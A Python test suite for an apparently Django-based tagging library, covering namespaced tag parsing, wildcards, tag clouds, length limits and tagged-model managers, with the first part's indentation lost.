self.assertEquals(parse_tag_input('foo:*=bar'), [u'foo:*=bar'])
self.assertEquals(parse_tag_input(':*:='), [u'"*:"'])
self.assertEquals(parse_tag_input('"*":foo bar="*"'), [u'*:foo', u'bar=*'])
self.assertEquals(parse_tag_input('"*"'), ['*'])
self.assertEquals(parse_tag_input('foo:"*"=bar'), [u'foo:*=bar'])
self.assertEquals(parse_tag_input(':"*":='), [u'"*:"'])
def test_keep_quotes(self):
self.assertEquals(parse_tag_input('*:foo bar=*', keep_quotes=['*']), [u'*:foo', u'bar=*'])
self.assertEquals(parse_tag_input('"*":foo bar=*', keep_quotes=['*']), [u'"*":foo', u'bar=*'])
self.assertEquals(parse_tag_input('"*":foo bar="*"', keep_quotes=['*']), [u'"*":foo', u'bar="*"'])
self.assertEquals(parse_tag_input('"*"', keep_quotes=['*']), ['"*"'])
self.assertEquals(parse_tag_input('*', keep_quotes=['*']), ['*'])
self.assertEquals(parse_tag_input('foo:*=bar', keep_quotes=['*']), [u'foo:*=bar'])
self.assertEquals(parse_tag_input('foo:"*"=bar', keep_quotes=['*']), [u'foo:"*"=bar'])
def test_default_namespace(self):
self.assertEquals(parse_tag_input('bar', default_namespace='foo'), [u'foo:bar'])
self.assertEquals(parse_tag_input('bar :bar', default_namespace='foo'), [u'bar', u'foo:bar'])
self.assertEquals(parse_tag_input('foo:bar bar', default_namespace='foo'), [u'foo:bar'])
self.assertEquals(parse_tag_input('bar=baz', default_namespace='foo'), [u'foo:bar=baz'])
self.assertEquals(parse_tag_input('bar=baz', default_namespace='col:on'), [u'"col:on":bar=baz'])
self.assertEquals(parse_tag_input('bar', default_namespace='foo'), [u'foo:bar'])
self.assertEquals(parse_tag_input('bar foo', default_namespace='foo'), [u'foo:bar', u'foo:foo'])
self.assertEquals(parse_tag_input('bar=foo', default_namespace='foo'), [u'foo:bar=foo'])
self.assertEquals(parse_tag_input(':bar', default_namespace='foo'), [u'bar'], [u'foo:bar'])
self.assertEquals(parse_tag_input('"":bar', default_namespace='foo'), [u'bar'], [u'foo:bar'])
self.assertEquals(parse_tag_input('space:bar foo=value', default_namespace='foo'), [u'foo:foo=value', u'space:bar'])
self.assertEquals(parse_tag_input('foo: foo:foo', default_namespace='foo'), [u'foo:foo'])
self.assertEquals(parse_tag_input('space:"bar foo"=value', default_namespace='foo'), [u'space:bar foo=value'])
self.assertEquals(parse_tag_input('space:bar foo=value, baz ter', default_namespace='foo'), [u'foo:baz ter', u'space:bar foo=value'])
self.assertEquals(parse_tag_input('foo bar', default_namespace='col:on'), [u'"col:on":bar', u'"col:on":foo'])
self.assertEquals(parse_tag_input('foo bar', default_namespace='spa ce'), [u'spa ce:bar', u'spa ce:foo'])
self.assertEquals(parse_tag_input('foo bar', default_namespace='equ=al'), [u'"equ=al":bar', u'"equ=al":foo'])
self.assertEquals(parse_tag_input(' ', default_namespace='equ=al'), [])
class TestSplitStrip(TestCase):
def test_with_empty_input(self):
self.assertEquals(split_strip(' foo '), [u'foo'])
self.assertEquals(split_strip(' foo , bar '), [u'foo', u'bar'])
self.assertEquals(split_strip(', foo , bar ,'), [u'foo', u'bar'])
self.assertEquals(split_strip(None), [])
def test_with_different_whitespace(self):
self.assertEquals(split_strip(' foo\t,\nbar '), [u'foo', u'bar'])
def test_with_athor_delimiter(self):
self.assertEquals(split_strip(' foo bar ', ' '), [u'foo', u'bar'])
def test_non_empty_input(self):
self.assertEquals(split_strip(''), [])
self.assertEquals(split_strip(None), [])
class TestNormalisedTagListInput(TestCase):
def setUp(self):
self.cheese = Tag.objects.create(name='cheese')
self.toast = Tag.objects.create(name='toast')
self.food_cheese = Tag.objects.create(namespace='food', name='cheese')
self.food_egg = Tag.objects.create(namespace='food', name='egg')
self.star_cheese_none = Tag.objects.create(namespace='*', name='cheese')
self.star_cheese_star = Tag.objects.create(namespace='*', name='cheese', value='*')
self.none_cheese_star = Tag.objects.create(name='cheese', value='*')
self.cheese_star_none = Tag.objects.create(namespace='cheese', name='*')
def test_single_tag_object_as_input(self):
self.assertEquals(get_tag_list(self.cheese), [self.cheese])
def test_single_string_as_input(self):
ret = get_tag_list('cheese')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese in ret)
ret = get_tag_list('food:egg')
self.assertEquals(len(ret), 1)
self.failUnless(self.food_egg in ret)
def test_space_delimeted_string_as_input(self):
ret = get_tag_list('cheese toast')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_comma_delimeted_string_as_input(self):
ret = get_tag_list('cheese,toast')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_namespaced_string_as_input(self):
ret = get_tag_list('cheese food:egg')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
def test_invalid_string_as_input(self):
ret = get_tag_list('=')
self.assertEquals(len(ret), 0)
ret = get_tag_list(':')
self.assertEquals(len(ret), 0)
ret = get_tag_list('"":""=""')
self.assertEquals(len(ret), 0)
def test_list_of_invalid_string_as_input(self):
ret = get_tag_list([''])
self.assertEquals(len(ret), 0)
ret = get_tag_list(['='])
self.assertEquals(len(ret), 0)
ret = get_tag_list([':'])
self.assertEquals(len(ret), 0)
ret = get_tag_list(['"":""=""'])
self.assertEquals(len(ret), 0)
def test_with_empty_list(self):
self.assertEquals(get_tag_list([]), [])
def test_with_single_tag_instance(self):
ret = get_tag_list(self.cheese)
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese in ret)
def test_list_of_two_strings(self):
ret = get_tag_list(['cheese', 'toast'])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
ret = get_tag_list(['cheese', 'food:egg'])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
def test_list_of_tag_primary_keys(self):
ret = get_tag_list([self.cheese.id, self.toast.id])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_list_of_strings_with_strange_nontag_string(self):
ret = get_tag_list(['cheese', 'toast', 'ŠĐĆŽćžšđ'])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_list_of_tag_instances(self):
ret = get_tag_list([self.cheese, self.toast])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_tuple_of_instances(self):
ret = get_tag_list((self.cheese, self.toast))
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_with_tag_filter(self):
ret = get_tag_list(Tag.objects.filter(name__in=['cheese', 'toast']))
self.assertEquals(len(ret), 6)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.toast in ret)
self.failUnless(self.none_cheese_star in ret)
self.failUnless(self.star_cheese_star in ret)
self.failUnless(self.star_cheese_none in ret)
def test_with_invalid_input_mix_of_string_and_instance(self):
try:
get_tag_list(['cheese', self.toast])
except ValueError, ve:
self.assertEquals(str(ve),
'If a list or tuple of tags is provided, they must all be tag names, Tag objects or Tag ids.')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('a ValueError exception was supposed to be raised!')
def test_with_invalid_input(self):
try:
get_tag_list(29)
except ValueError, ve:
self.assertEquals(str(ve), 'The tag input given was invalid.')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('a ValueError exception was supposed to be raised!')
def test_with_asterisks(self):
ret = get_tag_list('*:cheese')
self.assertEquals(len(ret), 1)
self.failUnless(self.star_cheese_none in ret)
ret = get_tag_list('cheese:*')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese_star_none in ret)
ret = get_tag_list('*:cheese=*')
self.assertEquals(len(ret), 1)
self.failUnless(self.star_cheese_star in ret)
ret = get_tag_list('cheese=*')
self.assertEquals(len(ret), 1)
self.failUnless(self.none_cheese_star in ret)
def test_with_wildcards(self):
ret = get_tag_list('*:cheese', wildcard='*')
self.assertEquals(len(ret), 3)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
ret = get_tag_list('cheese:*', wildcard='*')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese_star_none in ret)
ret = get_tag_list('*:cheese=*', wildcard='*')
self.assertEquals(len(ret), 5)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.star_cheese_star in ret)
self.failUnless(self.none_cheese_star in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
# you can quote the wildcard
ret = get_tag_list('"*":cheese="*"', wildcard='*')
self.assertEquals(len(ret), 1)
self.failUnless(self.star_cheese_star in ret)
ret = get_tag_list('cheese=*', wildcard='*')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.none_cheese_star in ret)
# you can use any string as wildcard
ret = get_tag_list('cheese=*', wildcard='cheese')
self.assertEquals(len(ret), 1)
self.failUnless(self.none_cheese_star in ret)
ret = get_tag_list('*:*=*', wildcard='*')
self.assertEquals(len(ret), 8)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.star_cheese_star in ret)
self.failUnless(self.none_cheese_star in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
self.failUnless(self.food_egg in ret)
def test_with_default_namespace(self):
ret = get_tag_list('cheese', default_namespace='food')
self.assertEquals(len(ret), 1)
self.failUnless(self.food_cheese in ret)
ret = get_tag_list(':cheese', default_namespace='food')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese in ret)
ret = get_tag_list('cheese :cheese', default_namespace='food')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_cheese in ret)
def test_with_wildcard_and_default_namespace(self):
ret = get_tag_list('*:cheese', wildcard='*', default_namespace='food')
self.assertEquals(len(ret), 3)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
ret = get_tag_list('*:cheese egg', wildcard='*', default_namespace='food')
self.assertEquals(len(ret), 4)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
ret = get_tag_list(['*:cheese', 'egg'], wildcard='*', default_namespace='food')
self.assertEquals(len(ret), 4)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
def test_with_tag_instance(self):
self.assertEquals(get_tag(self.cheese), self.cheese)
self.assertEquals(get_tag(self.cheese), self.cheese)
def test_with_string(self):
self.assertEquals(get_tag('cheese'), self.cheese)
def test_with_primary_key(self):
self.assertEquals(get_tag(self.cheese.id), self.cheese)
def test_nonexistent_tag(self):
self.assertEquals(get_tag('mouse'), None)
def test_get_tag_with_default_namespace(self):
self.assertEquals(get_tag('cheese', default_namespace='food'), self.food_cheese)
self.assertEquals(get_tag(':cheese', default_namespace='food'), self.cheese)
self.assertEquals(get_tag('*:cheese', default_namespace='food'), self.star_cheese_none)
class TestCalculateCloud(TestCase):
def setUp(self):
self.tags = []
for line in open(os.path.join(os.path.dirname(__file__), 'tags.txt')).readlines():
parts, count = line.rstrip().split()
tag = Tag(**get_tag_parts(parts))
tag.count = int(count)
self.tags.append(tag)
def test_default_distribution(self):
sizes = {}
for tag in calculate_cloud(self.tags, steps=5):
sizes[tag.font_size] = sizes.get(tag.font_size, 0) + 1
# This isn't a pre-calculated test, just making sure it's consistent
self.assertEquals(sizes[1], 48)
self.assertEquals(sizes[2], 30)
self.assertEquals(sizes[3], 19)
self.assertEquals(sizes[4], 15)
self.assertEquals(sizes[5], 10)
def test_linear_distribution(self):
sizes = {}
for tag in calculate_cloud(self.tags, steps=5, distribution=LINEAR):
sizes[tag.font_size] = sizes.get(tag.font_size, 0) + 1
# This isn't a pre-calculated test, just making sure it's consistent
self.assertEquals(sizes[1], 97)
self.assertEquals(sizes[2], 12)
self.assertEquals(sizes[3], 7)
self.assertEquals(sizes[4], 2)
self.assertEquals(sizes[5], 4)
def test_invalid_distribution(self):
try:
calculate_cloud(self.tags, steps=5, distribution='cheese')
except ValueError, ve:
self.assertEquals(str(ve), 'Invalid distribution algorithm specified: cheese.')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('a ValueError exception was supposed to be raised!')
class TestGetTag(TestCase):
def setUp(self):
self.foo_tag = Tag.objects.create(name='foo')
self.foobar_tag = Tag.objects.create(name='foo:bar')
self.barbaz_tag = Tag.objects.create(name='bar=baz')
self.bar_baz_tag = Tag.objects.create(name='bar', value='baz')
self.foo_bar_tag = Tag.objects.create(name='bar', namespace='foo')
self.foo_bar_baz_tag = Tag.objects.create(name='bar', namespace='foo', value='baz')
self.one_tag = Tag.objects.create(name='two three', namespace='one', value='four')
self.sign_tag = Tag.objects.create(name=':=', namespace=':=', value=':=')
def test_simple_tags(self):
self.failUnless(get_tag('foo'), self.foo_tag)
self.failUnless(get_tag('"foo:bar"'), self.foobar_tag)
self.failUnless(get_tag('foo:bar'), self.foo_bar_tag)
self.failUnless(get_tag('"bar=baz"'), self.barbaz_tag)
self.failUnless(get_tag('bar=baz'), self.bar_baz_tag)
self.failUnless(get_tag('foo:bar=baz'), self.bar_baz_tag)
self.failUnless(get_tag('"foo":"bar"="baz"'), self.bar_baz_tag)
self.failUnless(get_tag('one:"two three"=four'), self.one_tag)
self.failUnless(get_tag('":=":":="=":="'), self.sign_tag)
class TestGetTagParts(TestCase):
    """Tests for ``get_tag_parts``, which splits a raw tag string into a
    dict with ``namespace``, ``name`` and ``value`` keys.

    Uses ``assertEqual`` rather than the deprecated ``assertEquals`` alias.
    """
    def test_simple_cases(self):
        # Unquoted input splits on the first ':' (namespace) and '='
        # (value); absent parts come back as None and surrounding
        # whitespace is preserved as-is.
        self.assertEqual(get_tag_parts('bar'),
            {'namespace': None, 'name': 'bar', 'value': None})
        self.assertEqual(get_tag_parts('foo:bar'),
            {'namespace': 'foo', 'name': 'bar', 'value': None})
        self.assertEqual(get_tag_parts('bar=baz'),
            {'namespace': None, 'name': 'bar', 'value': 'baz'})
        self.assertEqual(get_tag_parts('foo:bar=baz'),
            {'namespace': 'foo', 'name': 'bar', 'value': 'baz'})
        self.assertEqual(get_tag_parts(' foo: bar =baz '),
            {'namespace': ' foo', 'name': ' bar ', 'value': 'baz '})
        # An explicitly empty namespace or value collapses to None.
        self.assertEqual(get_tag_parts(':foo'),
            {'namespace': None, 'name': 'foo', 'value': None})
        self.assertEqual(get_tag_parts('foo='),
            {'namespace': None, 'name': 'foo', 'value': None})
    def test_with_quotes(self):
        # Quoting protects ':' and '=' from being treated as separators.
        self.assertEqual(get_tag_parts('"bar="'),
            {'namespace': None, 'name': 'bar=', 'value': None})
        self.assertEqual(get_tag_parts('":="'),
            {'namespace': None, 'name': ':=', 'value': None})
        self.assertEqual(get_tag_parts('":=":":="=":="'),
            {'namespace': ':=', 'name': ':=', 'value': ':='})
    def test_keep_quotes(self):
        # Parts listed in keep_quotes keep their surrounding quote marks
        # in the result instead of having them stripped.
        self.assertEqual(get_tag_parts('*', keep_quotes=['*']),
            {'namespace': None, 'name': '*', 'value': None})
        self.assertEqual(get_tag_parts('"*"', keep_quotes=['*']),
            {'namespace': None, 'name': '"*"', 'value': None})
        self.assertEqual(get_tag_parts('*:"*"=*', keep_quotes=['*']),
            {'namespace': '*', 'name': '"*"', 'value': '*'})
        self.assertEqual(get_tag_parts('"*":"*"="*"', keep_quotes=['*']),
            {'namespace': '"*"', 'name': '"*"', 'value': '"*"'})
        # Quotes are stripped when the quoted content is not an exact
        # keep_quotes entry (here '*:' rather than '*').
        self.assertEqual(get_tag_parts('*:"*:"=*', keep_quotes=['*']),
            {'namespace': '*', 'name': '*:', 'value': '*'})
        self.assertEqual(get_tag_parts('*:"*:"=*', keep_quotes=['*']),
            {'namespace': '*', 'name': '*:', 'value': '*'})
    def test_default_namespace(self):
        # default_namespace fills in a missing namespace; an explicit
        # (even empty, via leading ':') namespace takes precedence.
        self.assertEqual(get_tag_parts('bar', default_namespace='foo'),
            {'namespace': 'foo', 'name': 'bar', 'value': None})
        self.assertEqual(get_tag_parts(':bar', default_namespace='foo'),
            {'namespace': None, 'name': 'bar', 'value': None})
        self.assertEqual(get_tag_parts('foo:bar', default_namespace='foo'),
            {'namespace': 'foo', 'name': 'bar', 'value': None})
        self.assertEqual(get_tag_parts('baz:bar', default_namespace='foo'),
            {'namespace': 'baz', 'name': 'bar', 'value': None})
class TestCheckTagLength(TestCase):
    """Tests for ``check_tag_length`` against the configurable maximum
    lengths for a tag's name, namespace, value and total size.

    Fixes: Python 2-only ``except X, e`` replaced by ``except X as e``
    (valid on 2.6+), deprecated ``assertEquals`` alias replaced, and the
    repeated try/except scaffolding factored into two helpers.
    """
    def setUp(self):
        # Save the configured limits so tests may change them freely.
        self.original_max_tag_length = conf.MAX_TAG_LENGTH
        self.original_max_tag_name_length = conf.MAX_TAG_NAME_LENGTH
        self.original_max_tag_namespace_length = conf.MAX_TAG_NAMESPACE_LENGTH
        self.original_max_tag_value_length = conf.MAX_TAG_VALUE_LENGTH
    def tearDown(self):
        # Restore the limits modified during the test.
        conf.MAX_TAG_LENGTH = self.original_max_tag_length
        conf.MAX_TAG_NAME_LENGTH = self.original_max_tag_name_length
        conf.MAX_TAG_NAMESPACE_LENGTH = self.original_max_tag_namespace_length
        conf.MAX_TAG_VALUE_LENGTH = self.original_max_tag_value_length
    def _assert_accepted(self, parts):
        """check_tag_length() must accept ``parts`` without raising."""
        try:
            check_tag_length(parts)
        except Exception as e:
            self.fail(e)
    def _assert_rejected(self, parts, part_name):
        """check_tag_length() must raise ValueError blaming ``part_name``
        (carried in ``args[1]``); any other exception propagates."""
        try:
            check_tag_length(parts)
            self.fail()
        except ValueError as ve:
            self.assertEqual(ve.args[1], part_name)
    def test_total_tag_length(self):
        conf.MAX_TAG_LENGTH = 50
        conf.MAX_TAG_NAME_LENGTH = 40
        conf.MAX_TAG_NAMESPACE_LENGTH = 10
        conf.MAX_TAG_VALUE_LENGTH = 10
        # Each component may be exactly at its limit...
        self._assert_accepted({'namespace': None, 'name': 'a' * 40, 'value': None})
        # ...but one character more must be rejected, blaming that part.
        self._assert_rejected({'namespace': None, 'name': 'a' * 41, 'value': None}, 'name')
        self._assert_accepted({'namespace': 'a' * 10, 'name': 'a', 'value': None})
        self._assert_rejected({'namespace': 'a' * 11, 'name': 'a', 'value': None}, 'namespace')
        self._assert_accepted({'namespace': None, 'name': 'a', 'value': 'a' * 10})
        self._assert_rejected({'namespace': None, 'name': 'a', 'value': 'a' * 11}, 'value')
        # The combined length must also stay within MAX_TAG_LENGTH; the
        # expected args[1] here is 'tag' per the original expectations.
        self._assert_accepted({'namespace': 'a' * 10, 'name': 'a' * 30, 'value': 'a' * 10})
        self._assert_rejected({'namespace': 'a' * 10, 'name': 'a' * 30, 'value': 'a' * 11}, 'tag')
#########
# Model #
#########
class TestTagModel(TestCase):
    """Tests for the unicode rendering of ``Tag`` instances."""
    def test_unicode_behaviour(self):
        # Each case pairs Tag constructor keyword arguments with the
        # expected unicode rendering; per these expectations, parts
        # containing ':' or '=' are emitted quoted.
        cases = (
            (dict(name='foo'), u'foo'),
            (dict(namespace='foo', name='bar'), u'foo:bar'),
            (dict(name='foo', value='bar'), u'foo=bar'),
            (dict(namespace='foo', name='bar', value='baz'), u'foo:bar=baz'),
            (dict(name='foo:bar'), u'"foo:bar"'),
            (dict(name='foo:bar=baz'), u'"foo:bar=baz"'),
            (dict(namespace='spam', name='foo:bar=baz'), u'spam:"foo:bar=baz"'),
            (dict(namespace='spam', name='foo:bar=baz', value='egg'), u'spam:"foo:bar=baz"=egg'),
            (dict(namespace='spam:egg', name='foo:bar=baz'), u'"spam:egg":"foo:bar=baz"'),
            (dict(name='foo:bar=baz', value='spam:egg'), u'"foo:bar=baz"="spam:egg"'),
            (dict(namespace=':', name=':=', value='='), u'":":":="="="'),
        )
        for kwargs, expected in cases:
            self.assertEqual(unicode(Tag(**kwargs)), expected)
###########
# Manager #
###########
class TestModelTagManager(TestCase):
    """Tests for the ``tagged`` tag manager exposed on ``Parrot``.

    Replaces the deprecated ``failUnless``/``assertEquals`` aliases with
    ``assertTrue``/``assertEqual`` and folds repeated membership checks
    into loops.
    """
    def setUp(self):
        # Four tagged parrots, each sitting on its own perch.
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'bar foo ter spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
    def test_manager_method_get_query_set(self):
        # Both get_query_set() and all() must yield every distinct tag.
        expected = ('bar', 'foo', 'baz', 'ter', 'spam:egg=ham', 'spam:foo')
        for tags in (Parrot.tagged.get_query_set(), Parrot.tagged.all()):
            self.assertEqual(len(tags), 6)
            for tag_input in expected:
                self.assertTrue(get_tag(tag_input) in tags)
    def test_manager_method_cloud(self):
        # cloud() annotates tags with usage count and a font size.
        cloud_tags = Parrot.tagged.cloud()
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEqual(len(relevant_attribute_list), 6)
        for expected in ((u'bar', 4, 4), (u'ter', 3, 3), (u'foo', 2, 2),
                         (u'spam:egg=ham', 2, 2), (u'baz', 1, 1),
                         (u'spam:foo', 1, 1)):
            self.assertTrue(expected in relevant_attribute_list)
    def test_manager_method_related(self):
        # related() returns tags co-occurring with the given ones,
        # annotated with counts when counts=True.
        related_tags = Parrot.tagged.related('bar ter', counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEqual(len(relevant_attribute_list), 4)
        for expected in ((u'baz', 1), (u'foo', 1), (u'spam:egg=ham', 1),
                         (u'spam:foo', 1)):
            self.assertTrue(expected in relevant_attribute_list)
    def test_manager_method_usage(self):
        # usage() lists every tag with its usage count when counts=True.
        tag_usage = Parrot.tagged.usage(counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEqual(len(relevant_attribute_list), 6)
        for expected in ((u'bar', 4), (u'baz', 1), (u'foo', 2), (u'ter', 3),
                         (u'spam:egg=ham', 2), (u'spam:foo', 1)):
            self.assertTrue(expected in relevant_attribute_list)
class TestModelTaggedItemManager(TestCase):
    """Tests for the ``tagged_items`` manager's object-level queries.

    Replaces the deprecated ``failUnless``/``assertEquals`` aliases with
    ``assertTrue``/``assertEqual``.
    """
    def setUp(self):
        # Four tagged parrots, fetched back afterwards by their state.
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'baz ter'),
            ('no more', 4, True, 'foo spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
        self.pining_for_the_fjords_parrot = Parrot.objects.get(state='pining for the fjords')
        self.passed_on_parrot = Parrot.objects.get(state='passed on')
        self.no_more_parrot = Parrot.objects.get(state='no more')
        self.late_parrot = Parrot.objects.get(state='late')
    def test_manager_method_related_to(self):
        related_objs = Parrot.tagged_items.related_to(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(related_objs), 2)
        self.assertEqual(related_objs, [self.no_more_parrot, self.late_parrot])
        # An explicit queryset restricts the candidate objects.
        related_objs = Parrot.tagged_items.related_to(self.late_parrot, Parrot.objects.filter(perch__smelly=False))
        self.assertEqual(len(related_objs), 1)
        self.assertEqual(related_objs, [self.passed_on_parrot])
        # num caps the number of results.
        related_objs = Parrot.tagged_items.related_to(self.pining_for_the_fjords_parrot, num=1)
        self.assertEqual(len(related_objs), 1)
        self.assertEqual(related_objs, [self.no_more_parrot])
        related_objs = Parrot.tagged_items.related_to(self.pining_for_the_fjords_parrot, Parrot.objects.exclude(state__startswith='p'), num=1)
        self.assertEqual(len(related_objs), 1)
        self.assertEqual(related_objs, [self.no_more_parrot])
    def test_manager_method_with_all(self):
        # with_all: objects carrying every one of the given tags.
        related_objs = Parrot.tagged_items.with_all('foo spam:egg=ham')
        self.assertEqual(len(related_objs), 2)
        self.assertTrue(self.pining_for_the_fjords_parrot in related_objs)
        self.assertTrue(self.no_more_parrot in related_objs)
        related_objs = Parrot.tagged_items.with_all('foo spam:egg=ham', Parrot.objects.filter(state__startswith='p'))
        self.assertEqual(len(related_objs), 1)
        self.assertTrue(self.pining_for_the_fjords_parrot in related_objs)
    def test_manager_method_with_any(self):
        # with_any: objects carrying at least one of the given tags.
        related_objs = Parrot.tagged_items.with_any('bar ter')
        self.assertEqual(len(related_objs), 3)
        self.assertTrue(self.pining_for_the_fjords_parrot in related_objs)
        self.assertTrue(self.passed_on_parrot in related_objs)
        self.assertTrue(self.late_parrot in related_objs)
        related_objs = Parrot.tagged_items.with_any('bar ter', Parrot.objects.filter(state__startswith='p'))
        self.assertEqual(len(related_objs), 2)
        self.assertTrue(self.pining_for_the_fjords_parrot in related_objs)
        self.assertTrue(self.passed_on_parrot in related_objs)
class TestTagDescriptor(TestCase):
    """Tests for the tag descriptor attributes (``tags``, ``spam``,
    ``spam2``, ``attrs``) exposed on tagged models.

    Replaces the deprecated ``failUnless``/``assertEquals`` aliases with
    ``assertTrue``/``assertEqual``; assertion order is preserved because
    the test bodies are stateful sequences.
    """
    def setUp(self):
        # Four tagged parrots, fetched back afterwards by their state.
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'baz ter'),
            ('no more', 4, True, 'foo spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
        self.pining_for_the_fjords_parrot = Parrot.objects.get(state='pining for the fjords')
        self.passed_on_parrot = Parrot.objects.get(state='passed on')
        self.no_more_parrot = Parrot.objects.get(state='no more')
        self.late_parrot = Parrot.objects.get(state='late')
    def test_descriptors_get_method(self):
        # On the model class the descriptor yields all tags of all
        # instances; on an instance, only that instance's tags.
        tags = Parrot.tags.all()
        self.assertEqual(len(tags), 6)
        for tag_input in ('foo', 'bar', 'spam:egg=ham', 'baz', 'ter', 'spam:foo'):
            self.assertTrue(get_tag(tag_input) in tags)
        tags = self.pining_for_the_fjords_parrot.tags
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'bar', 'spam:egg=ham'):
            self.assertTrue(get_tag(tag_input) in tags)
    def test_descriptors_set_method(self):
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'bar', 'spam:egg=ham'):
            self.assertTrue(get_tag(tag_input) in tags)
        # Assigning a tag string replaces the object's tags.
        self.pining_for_the_fjords_parrot.tags = 'foo baz spam:foo'
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'baz', 'spam:foo'):
            self.assertTrue(get_tag(tag_input) in tags)
        # Assigning None clears all tags.
        self.pining_for_the_fjords_parrot.tags = None
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 0)
    def test_descriptors_del_method(self):
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'bar', 'spam:egg=ham'):
            self.assertTrue(get_tag(tag_input) in tags)
        # Deleting the descriptor attribute removes all of the tags.
        del self.pining_for_the_fjords_parrot.tags
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 0)
    def test_descriptors_with_namespace(self):
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'bar', 'spam:egg=ham'):
            self.assertTrue(get_tag(tag_input) in tags)
        tags = self.pining_for_the_fjords_parrot.spam2
        self.assertEqual(len(tags), 1)
        self.assertTrue(get_tag('spam:egg=ham') in tags)
        # Setting through one namespaced descriptor is visible through the
        # other descriptor bound to the same namespace (spam/spam2).
        self.pining_for_the_fjords_parrot.spam = 'spam:egg'
        tags = self.pining_for_the_fjords_parrot.spam
        self.assertEqual(len(tags), 1)
        self.assertTrue(get_tag('spam:egg') in tags)
        tags = self.pining_for_the_fjords_parrot.spam2
        self.assertEqual(len(tags), 1)
        self.assertTrue(get_tag('spam:egg') in tags)
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'bar', 'spam:egg'):
            self.assertTrue(get_tag(tag_input) in tags)
        # Deleting only removes tags within the descriptor's namespace;
        # 'foo' and 'bar' survive.
        del self.pining_for_the_fjords_parrot.spam
        tags = self.pining_for_the_fjords_parrot.spam
        self.assertEqual(len(tags), 0)
